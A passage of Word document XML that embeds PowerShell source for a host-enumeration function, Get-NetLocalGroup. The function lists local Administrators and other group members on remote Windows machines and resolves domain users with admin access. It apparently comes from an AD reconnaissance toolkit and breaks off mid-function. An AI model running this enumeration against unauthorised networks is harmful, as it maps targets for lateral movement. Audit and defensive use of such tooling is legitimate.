    <w:p w14:paraId="5F7A7856" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78675467" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2F1DF977" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BF8226C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="694D5B0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB0F69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B1B7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># Functions that enumerate a single host, either through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DA7D47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve"># WinNT, WMI, remote registry, or API calls </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04D1BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># (with PSReflect).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEAA9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0013D494" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CEE432" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03150F03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetLocalGroup {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED93BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49A369" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E9AB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3951E7FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Gets a list of all current users in a specified local group,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163DFE1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        or returns the names of all local groups with -ListGroups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6349E477" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24CE8BD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D76C15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D5A2537" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname or IP to query for local group users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465282AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="666BFC90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C518B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F524713" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        File of hostnames/IPs to query for local group users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D83E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34396917" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19817817" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16E8D0F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The local group name to query for users. If not given, it defaults to "Administrators"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA46512" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49C6543B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ListGroups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A3C77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="300E83B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. List all the local groups instead of their members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DEC457" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Old Get-NetLocalGroups functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781F096E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59B9BA45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BC5E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B540AC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. If the local member member is a domain group, recursively try to resolve its members to get a list of domain users who can access this machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E68A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6971D23D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B6CDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3BAC3A0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Use API calls instead of the WinNT service provider. Less information,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593B9714" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        but the results are faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1FC75C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0430003F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408632F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="775E5C3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetLocalGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A056B92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CFCB0F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the usernames that of members of localgroup "Administrators" on the local host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D76A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="165DC1BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DDED57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DE6E43E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetLocalGroup -ComputerName WINDOWSXP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEFCDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78C751B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all the local administrator accounts for WINDOWSXP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11960856" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43CA89A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0FD7A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16D04762" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetLocalGroup -ComputerName WINDOWS7 -Recurse </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F32CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C5C9ECB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all effective local/domain users/groups that can access WINDOWS7 with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78448DB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        local administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC7EC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0997F95A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2645A493" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58C75BB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetLocalGroup -ComputerName WINDOWS7 -ListGroups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315694B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="177553D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all local groups on the WINDOWS7 host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1E20AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1DD8177D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609E850" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4521E6A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; "WINDOWS7", "WINDOWSSP" | Get-NetLocalGroup -API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409996B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F37B75B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all local groups on the the passed hosts using API calls instead of the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778205D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        WinNT service provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5226AC2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="30A7EE20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356708CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CC9B61B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715BF988" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7080BA6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D210C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C699269" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding(DefaultParameterSetName = 'WinNT')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7922CA2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B2AF8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'API', Position=0, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5005D5FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'WinNT', Position=0, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF5156" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0FFE7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A24491" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = $Env:ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562D5BFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="252F2014" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'WinNT')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE5BF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'API')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224AA4CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A0AA9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostList')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BDD240" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737C835" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02083C66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1101CFCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'WinNT')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8DAE8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'API')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D9E0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B554238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName = 'Administrators',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA54F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22FA0329" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'WinNT')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5812A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D0C446" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ListGroups,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2906740B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="779E8FD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'WinNT')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19009CF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4791BD2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Recurse,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D12D883" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1708F4C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'API')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA3524E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D995647" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F9066" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A37224" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D5ECE28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917B0C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CE5400C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Servers = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6D51E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49BAA1AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we have a host list passed, grab it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9A2D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ComputerFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1349245E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Servers = Get-Content -Path $ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7804F333" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F2EF8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DCD029" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # otherwise assume a single host name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A89F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Servers += $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA9C3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748F17B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0464D84D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # query the specified group using the WINNT provider, and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCAA291" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # extract fields as appropriate from the results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB6F0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ForEach($Server in $Servers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726FAEB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="418EABC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($API) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195FB59A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if we're using the Netapi32 NetLocalGroupGetMembers API call to get the local group information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6880D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # arguments for NetLocalGroupGetMembers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665E098D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $QueryLevel = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A15438" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $PtrInfo = [IntPtr]::Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828B4B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $EntriesRead = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA8EE07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
